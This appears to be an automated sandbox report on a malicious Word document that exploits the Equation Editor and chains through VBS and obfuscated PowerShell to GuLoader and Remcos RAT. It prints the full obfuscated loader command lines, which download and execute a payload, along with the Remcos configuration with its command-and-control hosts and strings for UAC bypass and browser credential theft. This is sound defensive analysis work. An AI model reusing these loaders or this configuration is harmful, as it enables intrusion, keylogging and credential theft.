Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
girlfrnd.doc

Overview

General Information

Sample name:girlfrnd.doc
renamed because original name is a hash value
Original sample name:createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd.doc
Analysis ID:1483047
MD5:9f63ee5ef179cfcf56619e1c9d44447a
SHA1:6c9efbc2d4a76e25d826f85b7f0d27906cade93a
SHA256:59d95b241a02fbef4d098fe7ff3ce6a5b97e638661429702744436c90c3047fa
Tags:doc
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Maps a DLL or memory area into another process
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2192 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 428 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 976 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 3220 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • wscript.exe (PID: 3460 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
              • powershell.exe (PID: 3604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
                • cmd.exe (PID: 3752 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t" MD5: AD7B9C14083B52BC532FBA5948342B98)
                • powershell.exe (PID: 3888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
                  • cmd.exe (PID: 3972 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t" MD5: AD7B9C14083B52BC532FBA5948342B98)
            • RegAsm.exe (PID: 3512 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwnuifnnlmnppbptlmxfdtbrgppi" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 3520 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uqsnjxygzufcshdfcxkgggwipdhrwsi" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 3528 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uqsnjxygzufcshdfcxkgggwipdhrwsi" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 3536 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\fkyx" MD5: 8FE9545E9F72E460723F484C304314AD)
    • EQNEDT32.EXE (PID: 3408 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "iwarsut775laudrye2.duckdns.org:57484:0iwarsut775laudrye2.duckdns.org:57483:1iwarsut775laudrye3.duckdns.org:57484:0hjnourt38haoust1.duckdns.org:57484:0", "Assigned name": "MAGIC", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "shietgtst-A57Q98", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "sfvnspt.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
girlfrnd.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x178f:$obj1: \objhtml
  • 0x17c7:$obj2: \objdata
  • 0x17b3:$obj3: \objupdate
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\sfvnspt.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6c4a8:$a1: Remcos restarted by watchdog!
        • 0x6ca20:$a3: %02i:%02i:%02i:%03i
        00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
        • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6656c:$str_b2: Executing file:
        • 0x675ec:$str_b3: GetDirectListeningPort
        • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x67118:$str_b7: \update.vbs
        • 0x66594:$str_b9: Downloaded file:
        • 0x66580:$str_b10: Downloading file:
        • 0x66624:$str_b12: Failed to upload file:
        • 0x675b4:$str_b13: StartForward
        • 0x675d4:$str_b14: StopForward
        • 0x67070:$str_b15: fso.DeleteFile "
        • 0x67004:$str_b16: On Error Resume Next
        • 0x670a0:$str_b17: fso.DeleteFolder "
        • 0x66614:$str_b18: Uploaded file:
        • 0x665d4:$str_b19: Unable to delete:
        • 0x67038:$str_b20: while fso.FileExists("
        • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
        00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
        • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x6637c:$s1: CoGetObject
        • 0x66390:$s1: CoGetObject
        • 0x663ac:$s1: CoGetObject
        • 0x70338:$s1: CoGetObject
        • 0x6633c:$s2: Elevation:Administrator!new:
        Click to see the 17 entries
        SourceRuleDescriptionAuthorStrings
        8.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          8.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            8.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4a8:$a1: Remcos restarted by watchdog!
            • 0x6ca20:$a3: %02i:%02i:%02i:%03i
            8.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
            • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
            • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x6656c:$str_b2: Executing file:
            • 0x675ec:$str_b3: GetDirectListeningPort
            • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x67118:$str_b7: \update.vbs
            • 0x66594:$str_b9: Downloaded file:
            • 0x66580:$str_b10: Downloading file:
            • 0x66624:$str_b12: Failed to upload file:
            • 0x675b4:$str_b13: StartForward
            • 0x675d4:$str_b14: StopForward
            • 0x67070:$str_b15: fso.DeleteFile "
            • 0x67004:$str_b16: On Error Resume Next
            • 0x670a0:$str_b17: fso.DeleteFolder "
            • 0x66614:$str_b18: Uploaded file:
            • 0x665d4:$str_b19: Unable to delete:
            • 0x67038:$str_b20: while fso.FileExists("
            • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
